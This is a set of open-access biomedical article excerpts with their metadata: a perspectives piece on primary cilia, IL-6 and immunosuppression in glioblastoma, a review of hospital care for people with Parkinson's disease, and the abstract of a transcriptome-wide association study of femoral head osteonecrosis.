Cell cycle-related kinase (CCRK) plays an evolutionarily conserved role in the assembly of cilia and is highly overexpressed in gliomas, where it is thought to play an oncogenic role (21,25). CCRK knockout mice display neural tube and skeletal defects identical to those seen in SHH-deficient mice; embryonic fibroblasts derived from these mice showed dysmorphic, non-functional cilia (21). In vitro, CCRK overexpression reduces cilia frequency and promotes proliferation in the U-251 glioblastoma cell line (26). Conversely, CCRK silencing led to the inhibition of cell growth in high CCRK-expressing U-373 and U-87 cell lines (27). Interestingly, CCRK activity has been linked to cytokine expression in other tumor models. For instance, in the Hepa1-6 hepatocellular carcinoma model, CCRK is necessary for IL-6 expression, which led to the expansion of MDSCs in peripheral blood (20). Whether this relationship between IL-6 and CCRK was related to the role of the latter in cilia structure and function has never been explored. We now show a similar, statistically significant reduction in IL-6 intracellular concentrations following depletion of proteins required for ciliogenesis (Figure 1). The implication is that it is the primary cilium specifically, and not CCRK per se, that is important in driving IL-6 expression, and that the relationship noted between CCRK, IL-6, and MDSC expansion is a direct result of the role of CCRK in primary ciliogenesis. We found a similar result with stable lentiviral transduction of shRNAs against essential ciliogenesis proteins and subsequently performed transcriptomic sequencing (data not shown). A potential mechanism by which cilia signaling may regulate IL-6 expression is through the GLI1-SHH pathway, the best-described cilia-dependent signaling cascade. The binding of SHH to the patched-1 receptor leads to the translocation and accumulation of Smoothened at the ciliary tip and activation of the GLI family of transcription factors, including GLI-1 (28). In a murine model of pancreatic cancer, GLI-1 binds to the IL-6 promoter and increases its expression, leading to a more aggressive phenotype (29). In the absence of activated GLI-1, mice developed only low-grade lesions, and at a low frequency. Glioblastoma and pancreatic adenocarcinoma are both reliant on EVs and IL-6 for immune modulation and cellular proliferation. Thus, the role of primary cilia may have far-reaching implications across multiple cancers.
IL-6 has emerged as a potential therapeutic target in the treatment of glioblastoma. Rolhion et al. found that glioblastomas displayed significantly higher IL-6 expression compared to other glioma types (3). IL-6 then orchestrates recruitment of tumor-associated macrophages of the M2 suppressive phenotype, which produce anti-inflammatory cytokines like IL-10 and TGF-β that in turn inhibit tumor-associated T-cell invasion and activation (30). Glioblastoma secretion of IL-6 increased PD-L1 expression on peripheral myeloid cells, promoting T cell anergy (31). Levels of IL-6 found in serum and cerebrospinal fluid corresponded to glioma grade, with significant reduction in levels following resection (32). Yang et al. found that knockout of IL-6 reduced the intra-tumoral population of myeloid cells and macrophages and enhanced the population of CD8+ T cells (30). Concomitantly, anti-IL-6 therapy improved overall survival by 30% in a GL261 murine glioblastoma model (30). Analysis of the TCGA dataset revealed that IL-6 and IL-6R mRNA levels were significantly higher in mesenchymal-subtype and IDH-wildtype glioblastoma (33). As mentioned previously, the mesenchymal subtype has the highest infiltration of immune cells. The influx and subsequent reprogramming of resident immune cells is due in part to EVs and IL-6, both of which are likely dependent on cilia signaling.
Review of glioblastoma-mediated immunosuppression: EVs, MDSCs, and tumor-associated myeloid cells
Extracellular vesicles (EVs) are a heterogeneous group of lipid membrane-enclosed vesicles released ubiquitously from cells; they contain proteins, nucleic acids, and other biological mediators (34) and allow for intercellular communication in both physiologic and pathophysiologic states. Several cancers, including breast, pancreas, prostate, and brain, produce high levels of EVs which condition the local cellular milieu (35)(36)(37). Glioblastoma-derived EVs were first described by Skog et al. in 2008 and actively promote glioblastoma cell proliferation and angiogenesis (38). There is now an abundance of contemporary evidence supporting a role for glioblastoma EVs in regulating multiple pathways that ultimately contribute to several key glioblastoma characteristics, including tumor-mediated immunosuppression. Hoang-Minh et al. demonstrated that glioblastoma primary cilia produce vesicles that may overlap with EVs. During G0 phase, glioblastoma primary cilia had vesicles that appeared to bud from the tip and float away out of the field of view (15). Furthermore, they found that these vesicles had mitogenic capacity, as their presence promoted tumor cell proliferation. It is possible that these same cilia-derived vesicles also contribute to the local and systemic immunosuppression which are hallmarks of glioblastomas and other cancers.
Local immunosuppression in the glioblastoma microenvironment is dependent on tumor-associated myeloid cells (microglia, macrophages, and monocytes), which constitute up to 30-50% of cells within glioblastoma tissues (39)(40)(41). These immune cells migrate via chemotaxis into the glioblastoma tumor microenvironment. Once within the tumor stroma, cells in the tumor microenvironment (including immune cells) are exposed to high EV levels (and presumably EV content) as well as other soluble factors. Glioblastoma EVs in the tumor microenvironment then stimulate local astrocytes to produce cytokines including CSF2 and CSF3, IL-4, -6, -10, and -13, which together promote a T-helper type 2 immunosuppressive phenotype (42). The result is immune cell reprogramming into immunosuppressive regulatory cells. Furthermore, glioblastoma EVs enhance the phagocytic capacity of tumor-associated macrophages and enhance the expression of membrane type 1-matrix metalloproteinase in microglia (43). Tumor-derived EVs promote extracellular matrix (ECM) remodeling, thus facilitating tumor migration and invasion (44,45). There is evidence of heterogeneity in EV expression and effects among glioblastoma subtypes. Mesenchymal glioblastoma cells secrete EVs at higher levels compared to those of the classical and pro-neural subclasses, as identified by mass spectroscopy (43). Low glioma EV concentrations are associated with immune activation and increased migration capacity of peripheral blood mononuclear cells (PBMCs), while high EV concentrations impair PBMC migration (46). The mesenchymal glioblastoma subtype has been associated with the highest infiltration of tumor-associated lymphocytes (47).
Glioblastoma-derived EVs are also implicated in systemic immunosuppression in glioblastoma. These EVs induce monocytes into myeloid-derived suppressor cells (MDSCs) and nonclassical monocytes (NCMs). Elevated levels of MDSCs are described in a number of cancers including melanoma, renal, gastric, bladder, pancreatic, and gliomas (48). The induction of MDSCs is particularly robust in glioblastomas, with circulating MDSCs in glioblastoma patients estimated at up to 12 times greater than those seen in controls (49,50). Predictably, there are resident NCMs and MDSCs identifiable in freshly resected glioblastoma tissue (5). Jung et al. showed that induction of MDSCs and NCMs was dependent on both PD-L1 and IDO1 expression within the EVs, in a mechanism dependent on interferon-γ (51). Interestingly, there was no identifiable direct effect of glioblastoma EVs on T cells. Instead, there was evidence for production of IL-10 by MDSCs and NCMs with resulting T cell inhibition. Glioblastoma patients have higher proportions of tumor-infiltrating regulatory T cells (Tregs), an effect of high circulating MDSCs (52,53). Compared to PBMCs, the ratio of exhausted CD4+ and CD8+ T cells is significantly higher in tumor regions (54). Glioblastoma-infiltrating NK cells show significantly lower cytolytic ability, owing to lower levels of interferon-γ (54). Treg depletion in a murine glioma model revealed prolonged survival compared to control mice (55). EVs regulate additional key tumor characteristics, including remodeling innate and adaptive immune cell behaviors, promoting therapy resistance, glioma stemness, and tissue invasion.
We present a theoretical framework in which primary cilia participate in glioblastoma immune programming (Figure 2) and present preliminary data supporting this hypothesis. We have shown that disruption of primary cilia via knockdown of CCRK, KIF3A, or IFT88 decreases IL-6 protein expression. It is evident that IL-6 is crucial for coordinating the M2 macrophage response in the glioblastoma microenvironment. Nonetheless, anti-IL-6 monotherapy showed only modest efficacy in in vivo preclinical glioblastoma models (30,31). Glioblastoma EVs are central to intercellular communication among glioblastoma cells, the local milieu, and peripheral immune cells. Primary cilia are a major organelle in extracellular communication and microenvironment sensing, and we cannot exclude the possibility that primary cilia are involved in GBM EV release, especially considering that vesicles have been shown to be released from primary cilia (15). Whether these primary cilia-derived vesicles are indeed EVs, and whether they are associated with tumor-mediated immunosuppression, is unknown and should be an avenue for further investigation. Understanding the contribution of primary cilia to GBM tumor immunosuppression may be pivotal in the development of novel therapies.
Implications for glioblastoma immunotherapy
Immunotherapy has garnered interest in glioblastoma research in large part due to the revolutionary improvement in survival noted with several systemic cancers. Unfortunately, no immunotherapy treatments have met the efficacy and safety profiles needed for widespread clinical adoption or FDA approval. It is possible that the primary cilium, as a principal organelle in microenvironment sensing and communication, is involved in regulation of both IL-6 and glioblastoma EVs. Primary cilia signaling could be therapeutically targeted, leading to suppression of IL-6, of EV packaging and secretion, and of other cellular cues such as proliferation and invasion. Thus, the immunosuppressive effects of these soluble factors could potentially be reversed, reconstituting antitumor immunity and rendering glioblastomas more amenable to immunotherapy. Further investigation into the interplay between primary cilia signaling and glioblastoma-mediated immunosuppression will be necessary and may lead to the development of novel 'ciliotherapeutic' approaches to glioblastomas.
Conclusions
Glioblastoma is the most common CNS malignancy. It remains universally fatal, with only small gains in survival over the last three decades. The tumor is genetically complex, with several simultaneously dysregulated pathways. There is also profound local and systemic immunosuppression, which limits the efficacy of immunotherapy. Understanding the interplay between glioblastoma and its microenvironment is key to developing effective immunotherapies. In this perspectives article, we provide evidence for a role of primary cilia in IL-6 release and immunosuppression. We also suggest a potential role of primary cilia in EV release. There is potential for novel cilia-related therapeutic strategies, which would be a welcome addition to the armamentarium against this deadly disease.
FIGURE 1. IL-6 expression is dependent on primary cilia. Ciliogenesis-required proteins KIF3A, IFT88, and CCRK were depleted via transfection using siRNA or a scrambled control (siCON). (A) dBT114 cell protein levels were assessed by immunoblotting, with HSP90 serving as loading control. (B) Densitometric analysis of the bands is shown. (C) The effect of knockdown on IL-6 mRNA transcription in dBT114 cells was assessed by qRT-PCR. Knockdown of genes required for ciliogenesis resulted in depletion of IL-6 as assessed by ELISA for cell lines (D) dBT116 and (E) dBT114. All experiments were performed in triplicate. Means were compared using the two-sided Student's t-test. *** denotes a P-value <0.005. CCRK was suppressed using shRNA or a scrambled control (shCON), and immunocytochemistry was performed on dBT116 glioblastoma cells for the basal body with gamma tubulin and the primary cilia axoneme with Arl13B. Nuclei were stained with a DAPI counterstain. Representative images were obtained at 20X with DAPI, Alexa 488, and Alexa 549 fluorophores. Scale bar 20 µm. (F) Control dBT116 cells (shCON) demonstrating the presence of a basal body as well as an adjoining Arl13B-positive axoneme indicating the presence of a primary cilium. (G) CCRK-suppressed dBT116 cells (shCCRK) have basal bodies revealed through gamma tubulin staining, but lack primary cilia, as evidenced by the absence of an Arl13B-positive axoneme. Arrows denote structures of interest. **** denotes a P-value <0.001.
FIGURE 2. Mechanisms of glioblastoma-mediated immunosuppression. Immunosuppressive effects can be categorized as those resulting from EVs, IL-6, or both. Primary cilia may be involved in both EV release and IL-6 expression, and thus may play a central role in tumor-mediated immunosuppression. | 2023-12-20T16:03:52.839Z | 2023-12-18T00:00:00.000 | {
"year": 2023,
"sha1": "cc7873f2ac058076302f0e79b819dca170574a76",
"oa_license": "CCBY",
"oa_url": null,
"oa_status": null,
"pdf_src": "PubMedCentral",
"pdf_hash": "4ef26b5b399f55d64906555dcdc6f8e89b6d3d25",
"s2fieldsofstudy": [
"Medicine",
"Biology"
],
"extfieldsofstudy": []
} |
258982417 | pes2o/s2orc | v3-fos-license | Inpatient Parkinson’s Care: Challenges and Special Considerations
Hospital systems often have workflows that prevent accurate administration of medications. Inaccuracies in medication administration occur at alarming rates: missed doses occur in up to half of cases [14], and administration occurs more than 30 minutes after the order time in 51% of doses and more than one hour after the order time in 30% of doses. [15] Furthermore, people with PD have individualized outpatient regimens with varying doses, formulations, and time intervals that are tailored to their symptoms throughout the day. One significant source of error is orders written as "qd," "bid," and "tid" to suit hospital schedules, which are inappropriate for time-dependent dopaminergic PD medications and often deviate from the patient's home regimen. [12] We examined deviation rates between hospital administration times and the patient's home regimen [16] and found that 47% of patients had an average hospital dose-timing interval that differed from the outpatient timing interval by greater than 30 minutes. Admissions where at least one day included a 30-minute or greater deviation in the dosing interval had a longer length of stay (median 4.6 days vs 2.0 days). Delays relative to both inpatient order times and outpatient regimens have been associated with poor outcomes, emphasizing the need for strict adherence to patients' individualized outpatient medication regimens.
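The dose-interval deviation described above can be computed directly from administration timestamps; the following Python sketch flags a greater-than-30-minute deviation between the average in-hospital interval and the home interval. The schedules shown are hypothetical examples, not patient data.

from datetime import datetime

def mean_interval_minutes(times):
    """Average interval, in minutes, between consecutive dose times."""
    ts = sorted(datetime.fromisoformat(t) for t in times)
    gaps = [(b - a).total_seconds() / 60.0 for a, b in zip(ts, ts[1:])]
    return sum(gaps) / len(gaps)

home_doses = ["2024-01-01T07:00", "2024-01-01T11:00",
              "2024-01-01T15:00", "2024-01-01T19:00"]      # q4h at home
hospital_doses = ["2024-01-02T08:15", "2024-01-02T13:30",
                  "2024-01-02T18:45", "2024-01-02T23:00"]  # as administered

deviation = abs(mean_interval_minutes(hospital_doses)
                - mean_interval_minutes(home_doses))
print(f"Mean dosing-interval deviation: {deviation:.0f} minutes")
if deviation > 30:
    print("FLAG: dosing interval deviates >30 min from home regimen")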
PD medication regimens are varied and complex.
Levodopa formulations are varied and complex, with different pharmacokinetic and pharmacodynamic properties by formulation. [11,17] For example, carbidopa/levodopa immediate release (IR) combined with entacapone has the same half-life as IR alone but is absorbed more slowly and carries an approximately 30% higher levodopa equivalent dose. Of note, entacapone should be administered concomitantly with levodopa to achieve its effect of increased and more sustained plasma levodopa concentrations. Another formulation, carbidopa/levodopa controlled release (CR), has a bioavailability of 70% of IR with a maximum serum concentration of 30% of IR, thereby requiring individual doses as high as three times the IR dose to achieve the same plasma levels. [17] Aside from variations in levodopa, patients are on a wide variety of PD medications including dopamine receptor agonists, catechol-O-methyltransferase (COMT) inhibitors, adenosine 2A receptor antagonists, anticholinergics, and other medications used to treat non-motor symptoms, including those for psychosis, orthostatic hypotension, etc. Each medication has a different levodopa equivalent daily dose conversion factor [18,19], which makes conversion from one to another error prone, especially for clinicians relatively inexperienced with PD care.
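For illustration, a minimal levodopa equivalent daily dose (LEDD) calculator is sketched below. The conversion factors are the commonly cited ones (e.g., from the systematic review by Tomlinson and colleagues) and should be verified against references [18,19] before any clinical use; the example regimen is hypothetical.

# Commonly cited LEDD conversion factors (verify against [18,19]).
LEDD_FACTOR = {
    "levodopa_ir": 1.0,   # immediate release
    "levodopa_cr": 0.75,  # controlled release
    "pramipexole": 100.0,
    "ropinirole": 20.0,
    "rotigotine": 30.0,
    "rasagiline": 100.0,
    "amantadine": 1.0,
}

def ledd(regimen, entacapone=False):
    """Total LEDD (mg) for a daily regimen {drug: total daily mg}.
    Entacapone is modeled as adding 0.33 x the levodopa-derived LEDD."""
    total = sum(LEDD_FACTOR[drug] * mg for drug, mg in regimen.items())
    if entacapone:
        levo = sum(LEDD_FACTOR[d] * mg for d, mg in regimen.items()
                   if d.startswith("levodopa"))
        total += 0.33 * levo
    return total

regimen = {"levodopa_ir": 600, "levodopa_cr": 200, "pramipexole": 3.0}
print(f"LEDD: {ledd(regimen, entacapone=True):.0f} mg/day")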
Certain medications are contraindicated due to PD pathophysiology.
Another common issue is that contraindicated medications are often given when patients decompensate, which further worsens motor function, resulting in immobility and falls. An acutely agitated patient may be given haloperidol, or a nauseated patient may be given metoclopramide. Because the fundamental pathophysiology of PD involves loss of dopaminergic cells, it is important to take note of medications that affect dopaminergic states. Relatively commonly encountered medications with dopamine receptor-blocking properties include antipsychotics (haloperidol, fluphenazine, chlorpromazine, risperidone, olanzapine, ziprasidone, aripiprazole, etc.) and antiemetics (metoclopramide, promethazine, prochlorperazine, etc.).
Administration of contraindicated medications in PD patients experiencing delirium has been associated with increased lengths of stay compared to individuals without PD. [20] These medications further worsen mobility, cognition, and swallowing [4,12,21], resulting in extended hospital stays and increased fatalities. [16,22,23] Medication selection is therefore critical when managing behavioral issues, to avoid worsening motor function and medical complications.
Patients with PD are at an increased risk of mental status changes in-hospital.
People with PD have up to a five-fold risk of experiencing delirium or psychosis in the hospital. [24] Manifestations are variable, including confusion, hallucinations, agitation, and hypomania [25], and the underlying etiologies are multifactorial. Patients are being managed for acute and active conditions such as metabolic derangements, infections, or surgical procedures, which predispose them to mental status changes secondary to systemic illness or exposure to new medications, including certain classes of antibiotics and anesthetic agents. Among patients undergoing surgical procedures, as many as 60% of patients with PD experienced acute postoperative confusion lasting an average of 2.5 days, with a relative risk between 2.8 and 8.1. [26] The hospital is also an unfamiliar environment with continuous monitoring that often disrupts patients' circadian rhythm. These factors create challenges for patients with PD, who thrive on familiarity and routine. Lastly, patients may have baseline cognitive impairment prior to hospitalization, which lowers the threshold for mental status changes in an unfamiliar environment when compounded by active metabolic derangements, infectious/inflammatory processes, and/or exposure to new medications.
Patients with PD are at an increased risk for falls.
Hospitalized patients are at an increased risk for falls. [27] This risk is even higher in patients with PD due to several factors beyond their baseline motor impairment and gait instability. Orthostatic hypotension is experienced by up to 40% of patients with PD [28], which increases the risk for falls, morbidity, and mortality. [29] This can be aggravated by dehydration, or by discontinuation of medications for orthostatic hypotension when supine hypertension is encountered by relatively inexperienced clinicians. Nocturnal urinary frequency is also common; the need to void at times when lighting may be poor or assistance is unavailable predisposes patients to falls. Staffing constraints have also been found to be associated with increased risk of falls. [30] Another important aspect to consider is polypharmacy and the use of new medications, including sedatives or antihistamines. [31] The use of antidopaminergic medications has been shown to increase falls with an odds ratio of 5.0 [32], which in turn reduces patients' ability to participate in rehabilitation and thereby increases the length of stay. [33]

Prolonged NPO status results in complications.
Given that carbidopa/levodopa is dosed several times per day due to its short half-life, problems arise when patients are kept NPO for longer than necessary. A study on perioperative medication withholding found that the median levodopa withholding time was 12.35 hours [34], equivalent to 2-4 missed doses depending on the patient's regimen. A patient may also be placed on NPO status for nausea, often without proper dysphagia screening or consultation with a speech language pathologist (SLP). As emphasized, missed doses predispose patients to mobility problems, falls, worsening of tremor, dystonia, dysphagia, freezing of gait, and other non-motor symptoms, including shortness of breath and anxiety. Because of the consequences of missed doses, circumstances that preclude patients from receiving their medications call for special considerations, which are discussed below.
Certain factors increase the risk for infections.
Patients with PD often experience sialorrhea and may have silent aspiration, which increases the risk of respiratory infections [35], emphasizing the need for proactive interventions in this population. Despite pervasive swallowing problems in PD [36], swallow evaluations were performed in only 25% of cases, and only one in eight patients had a swallowing evaluation performed prior to an aspiration event. [37] The risk of aspiration can be further aggravated by prolonged NPO status or prolonged intubation. Considering their baseline swallowing problems, screening and monitoring for swallowing problems should be the standard of care in this population.
Perioperative management of PD presents unique scenarios.
A considerable proportion of people with PD are admitted for emergent or elective surgeries. Perioperative states often expose this vulnerable population to critical gaps in care, which frequently result in post-procedural deterioration and complications. [38] Patients with sialorrhea and dystonic neck posturing may present challenges in airway management. Dysautonomia and neurogenic orthostatic hypotension are experienced by up to 40% of patients [28], with possible arterial hypertension when supine [39,40], giving rise to fluctuations in blood pressure control intraoperatively. Patients are also predisposed to medication interactions, particularly with agents that have QT-prolonging effects in the setting of concomitant general anesthesia (antiemetics such as ondansetron, antipsychotics such as quetiapine, antidepressants such as citalopram). In cases of postoperative nausea and agitation, a patient is commonly either placed on NPO status or given medications with antidopaminergic properties, which further worsen motor function. Mobilization post-surgery is also critical to prevent further deterioration of motor function. Lastly, surgical devices such as deep brain stimulation (DBS) leads and implantable pulse generators (IPGs) warrant preoperative preparation.
HOW DO WE OPTIMIZE INPATIENT CARE?
Given what we know about the fragility of people with PD when hospitalized, identifying controllable risk factors and minimizing their impact on this population is paramount. An ideal strategy takes a three-pronged approach involving education, technology, and proactive intervention by specialists as part of a multifaceted model of care.
Medication administration
As individuals with PD are admitted for a myriad of reasons other than PD-related issues, they receive care in units other than those specialized in neurologic care. Therefore, there is a need to educate all providers on the complexity of PD medications, emphasizing the need for timely administration and avoidance of substitutions and contraindicated medications. Nursing education and other measures, including pharmacist review of medications and improved stocking of medications, have reduced length of hospital stay and improved medication administration. [13,41,42] Technology can also facilitate medication administration and avoidance of contraindicated medications. Medication order constraints that force custom hour/minute administration times, together with drug-disease interaction and missed-dose timing alerts, serve as reminders for all healthcare providers and may be particularly helpful for those relatively inexperienced in inpatient PD care. A full list of medications to be avoided or used with caution among patients with PD can be found on the American Parkinson Disease Association page. [43] Electronic medical record alerts and in-service didactic training sessions for nurses and physicians have indeed been shown to significantly reduce prescribing of contraindicated medications. [42] Along these lines, the clinical pharmacist's role is extremely vital, especially in institutions without such electronic medical record systems. Another strategy is to utilize active interventions to improve PD care. Similar to stroke care, it has been suggested that involving PD specialists or advanced practice nurses can improve a patient's hospitalization experience. [44,45] A specialized PD unit where the nursing staff is specifically trained in the care of PD has been shown to result in reduced medication delays, shorter length of stay, and fewer episodes of acute delirium. [46] In hospitals where a specialized PD unit may not be feasible, active intervention via a PD consultation service is an option. This involves having a physician or nurse trained in PD care as a resource for concerns surrounding special circumstances with which other staff may be unfamiliar. In relation to medication availability, hospital pharmacies commonly stock only a judicious selection of specific medications. At a minimum, IR carbidopa/levodopa should be stocked, with efforts to ensure a supply of at least 24 hours when a patient is admitted. When other levodopa formulations are unavailable, consider using medications from the patient's personal supply until the specific formulation becomes available. As a last resort, levodopa equivalent doses can be calculated with the guidance of a therapeutic exchange protocol. [18,47] The goal, however, is to avoid substitutions unless absolutely necessary, and to maintain all patients on their outpatient regimen as closely as possible (within 15 minutes of the outpatient schedule, 100% of the time), unless there is convincing evidence that a recent change in the regimen has created a change in symptoms that led to hospitalization.
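As a sketch of the kind of drug-disease interaction alert described above, the snippet below checks new orders against a contraindicated list. The list is an illustrative subset drawn from the dopamine receptor blockers named in this article, not a complete clinical reference; consult the APDA list cited in the text for comprehensive guidance.

CONTRAINDICATED_IN_PD = {
    "haloperidol", "fluphenazine", "chlorpromazine", "risperidone",
    "olanzapine", "metoclopramide", "promethazine", "prochlorperazine",
}
SAFER_ALTERNATIVES = {
    "metoclopramide": "ondansetron or domperidone",
    "haloperidol": "quetiapine, clozapine, or pimavanserin",
}

def check_order(drug, has_parkinsons):
    """Return an alert string if the order is contraindicated, else None."""
    name = drug.strip().lower()
    if has_parkinsons and name in CONTRAINDICATED_IN_PD:
        alt = SAFER_ALTERNATIVES.get(name, "a non-dopamine-blocking agent")
        return (f"ALERT: {drug} is contraindicated in Parkinson disease; "
                f"consider {alt}.")
    return None

for order in ["Metoclopramide", "Ondansetron", "Haloperidol"]:
    alert = check_order(order, has_parkinsons=True)
    print(alert or f"{order}: no PD interaction flagged")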
Diet status and progression, speech and swallow
Unnecessary NPO status should be avoided. If NPO status is being considered because of identified swallowing problems, it is prudent to obtain an SLP swallowing evaluation before placing the patient on NPO. For procedures other than major gastrointestinal surgeries, NPO status should be ordered as NPO except for PD medications. Strict NPO status, including medications, should be reserved only for major gastrointestinal surgeries. If strict NPO status is necessary, alternative routes of administration, such as a nasogastric tube if not contraindicated, or alternative formulations should be considered when appropriate for the patient. Options, depending on availability, include orally disintegrating (sublingual) carbidopa/levodopa, inhaled levodopa, levodopa-carbidopa intestinal gel infusion via pump, rotigotine transdermal patch, or apomorphine by sublingual film or subcutaneous injection.
To minimize the risk of aspiration, a standard screening protocol should be established to assess dysphagia risk. This should include patients without known swallowing problems prior to admission, as silent aspiration and sialorrhea may increase aspiration risk in this population. [35] Screening for dysphagia should ideally be done within 24 hours, with measures taken to minimize the risk of aspiration pneumonia. Ideally, bedside nurses should be trained to complete bedside swallow screening for all patients with PD and to notify the team of abnormal results, which should prompt referral to SLP for further management. Measures to minimize the risk of aspiration should be in place, including ensuring that patients sit upright in a chair instead of the bed when eating or, if confined to bed, that the head of the bed is as upright as possible. Patients identified as being at high risk for aspiration based on SLP evaluation warrant closer supervision. Lastly, patients experiencing varying degrees of dysphagia should be placed on an appropriate regimen that prioritizes the closest possible adherence to their home regimen; this entails consulting neurology when considering holding PD medications due to concern for dysphagia.
Management of mental status changes
Mental status changes (agitation, delirium, psychosis, confusion, hallucinations) are often multifactorial in nature. As PD patients thrive on familiarity and routine, they need to be frequently reoriented to the hospital setting and the time of day. When there is no urgent need for monitoring, minimize nighttime sleep interruptions to allow the patient to rest as well as possible. Maintain the home regimen that worked well prior to admission, and correct underlying problems such as metabolic disturbances. Carefully review medications to remove offending factors, such as medications that could precipitate delirium. This may entail multidisciplinary management with the services involved (e.g., discussion with infectious disease specialists, as certain antimicrobials may lower the threshold for developing mental status changes). When medications are necessary, consider using clozapine, quetiapine, or pimavanserin, based on the best current evidence. [48] Classifications of mental status changes in PD are variable [25], and a consensus on management of acute agitation among hospitalized patients with PD is yet to be established.
Mobilization strategies
Immobilization not only results in poor motor function but also increases the risk of deep venous thrombosis, which was present in 5% of patients with PD on outpatient workup. [49] Patients should not be confined to bed. Consider reinstating mobilization orders as tolerated, including postoperatively once stable, with fall precautions in place. Monitor the mobilization of patients with gait problems, use toileting strategies for patients with incontinence, and adjust medications that may predispose patients to falls. Ensure adequate staffing and train allied care professionals (physical and occupational therapists) to allow timely and safe mobilization.
Management of orthostatic hypotension should be optimized as it can be a barrier to effective rehabilitation sessions. When orthostatic hypotension is present, pay careful attention to increases in dopaminergic medications. Consult with a neurologist when considering adjustments in dopaminergic medications. Avoid aggressive management of hypertension in a patient with neurogenic orthostatic hypotension. Hydrate adequately, use medications (midodrine, fludrocortisone, etc.) when appropriate, allow liberal salt in the diet, and elevate the head of bed.
Perioperative considerations
A multidisciplinary approach is warranted to avoid complications that may arise at multiple levels perioperatively. The admitting team, nurses, and pharmacy should coordinate to ensure timely administration of medications. Surgeries should be scheduled earlier in the day if the patient is to be kept NPO overnight, to minimize disruptions to the PD medication regimen. The nuances of NPO status and the necessary planning before, during, and after surgery should be addressed through team training and standard perioperative care. Anti-PD medications should be continued with sips of water. Providers should be aware of dopamine agonist withdrawal syndrome, which presents with psychiatric and autonomic symptoms and may be mistaken for wearing-off or mental status changes in the hospital. [50] Intraoperatively, the medical team should be aware of possible challenges in airway management, especially among patients with dystonic neck posturing and sialorrhea. A careful review of the patient's non-motor symptoms is critical to identify any history of dysautonomia, as this may give rise to intraoperative fluctuations in blood pressure control. Fluid volume status and pain should be controlled adequately to prevent blood pressure fluctuations. For patients with PD, paracetamol and nonsteroidal anti-inflammatory drugs (NSAIDs) are generally safe. Carefully review medications, as patients with PD may be taking drugs associated with QT prolongation, a risk compounded by concomitant general anesthesia.
For patients with a DBS device, the IPG should be switched off prior to the procedure and switched back on afterward. Electromagnetic interference with the IPG from electrical appliances used during surgery and resuscitation (eg, diathermy, electrocautery, external cardiac defibrillation) can alter stimulation and possibly result in IPG failure. [51-53] Postoperatively, ensure resumption of PD medications when appropriate (ie, after all surgeries other than major gastrointestinal surgery, etc). For patients who are nauseated, consider a disintegrating levodopa formulation. Certain institutions utilize a standard postoperative order set intended for the general patient population; review such order sets and exclude antidopaminergic medications for nausea and agitation. If an antiemetic is to be given, prefer ondansetron or domperidone over metoclopramide, promethazine, and prochlorperazine. Finally, ensure early involvement of SLP/occupational therapy to prevent aspiration and of physical therapy to prevent deconditioning.
SUMMARY/TAKE HOME POINTS
Individuals with PD are vulnerable during hospitalizations due to the underlying complexities of PD pathophysiology.
A detailed understanding of factors driving the risk for deterioration among hospitalized people with PD is necessary to guide development of targeted care delivery.
Management should involve ensuring accurate medication administration, avoidance of prolonged NPO, fall precaution, appropriate medications for mental status changes, early referral to allied care services, optimization of perioperative care, and timely management of acute changes of PD symptoms impacted by hospitalization.
An integrated care approach involving the patient, caregiver, primary physician, nurse, pharmacist, outpatient neurologist and anesthesiologist is vital in optimizing inpatient care.
Open Access This article is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License, which permits use, sharing (copying and redistributing the material in any medium or format) and adaptation (remixing, transforming, and building upon the material), as long as you give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use. You may not use the material for commercial purposes. If you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original. You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits. The images or other third party material in this article are included in the article's Creative Commons license, unless indicated otherwise in a credit line to the material. If material is not included in the article's Creative Commons license and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this license, visit https://creativecommons.org/licenses/by-nc-sa/4.0/.
"year": 2023,
"sha1": "71881bdc9833018190dddec019a73c265a27a15d",
"oa_license": "CCBY",
"oa_url": "https://www.jmust.org/elib/journal/doi/10.35460/2546-1621.2023-0032/pdf",
"oa_status": "HYBRID",
"pdf_src": "Anansi",
"pdf_hash": "b8d4277f71692d12923d6c40a5a9470c7fa85057",
"s2fieldsofstudy": [
"Psychology"
],
"extfieldsofstudy": []
} |
Integrating Transcriptome-Wide Association Study and mRNA Expression Profiling Identifies Novel Genes Associated With Osteonecrosis of the Femoral Head
Objective: This study aims to identify novel candidate genes associated with osteonecrosis of the femoral head (ONFH). Methods: A transcriptome-wide association study (TWAS) was performed by integrating the genome-wide association study dataset of osteonecrosis (ON) in the UK Biobank with pre-computed mRNA expression reference weights of muscle skeleton (MS) and blood. The ON-associated genes identified by TWAS were further subjected to gene ontology (GO) analysis using the DAVID tool. Finally, a trans-omics comparative analysis of TWAS and genome-wide mRNA expression profiling was conducted to identify the common genes and GO terms shared by the DNA-level TWAS and the mRNA-level expression profile for ONFH. Results: TWAS identified 564 genes with P_TWAS < 0.05 for MS and blood, such as CBX1 (P_TWAS = 0.0001 for MS), SRPK2 (P_TWAS = 0.0002 for blood), and MYO5A (P_TWAS = 0.0005 for blood). After comparing the genes detected by TWAS with the differentially expressed genes identified by mRNA expression profiling, we detected 59 overlapping genes, such as STEAP4 [P_TWAS = 0.0270, fold change FC_mRNA = 7.03], RABEP1 (P_TWAS = 0.010, FC_mRNA = 2.22), and MORC3 (P_TWAS = 0.0053, FC_mRNA = 2.92). GO analysis of the TWAS-identified genes discovered 53 GO terms for ON. Further comparison of the GO results of TWAS and mRNA expression profiling identified four overlapping GO terms: cysteine-type endopeptidase activity (P_TWAS = 0.0006, P_mRNA = 0.0227), extracellular space (P_TWAS = 0.0342, P_mRNA = 0.0012), protein binding (P_TWAS = 0.0112, P_mRNA = 0.0106), and ATP binding (P_TWAS = 0.0464, P_mRNA = 0.0033). Conclusion: Several ONFH-associated genes and GO terms were identified by integrating TWAS and mRNA expression profiling, providing novel clues to the pathogenesis of ONFH.
INTRODUCTION
Osteonecrosis (ON) is a common orthopedic disorder, the pathological hallmark of which is the death of bone cells owing to decreased blood flow (Assouline-Dayan et al., 2002). Although ON can occur at different skeletal sites, such as the hips, jaw, knees, shoulders, and ankles, the femoral head is the most commonly affected. There are 20,000 to 30,000 new cases of osteonecrosis of the femoral head (ONFH) in the United States every year, of which about 5-10% end up requiring total hip replacement.
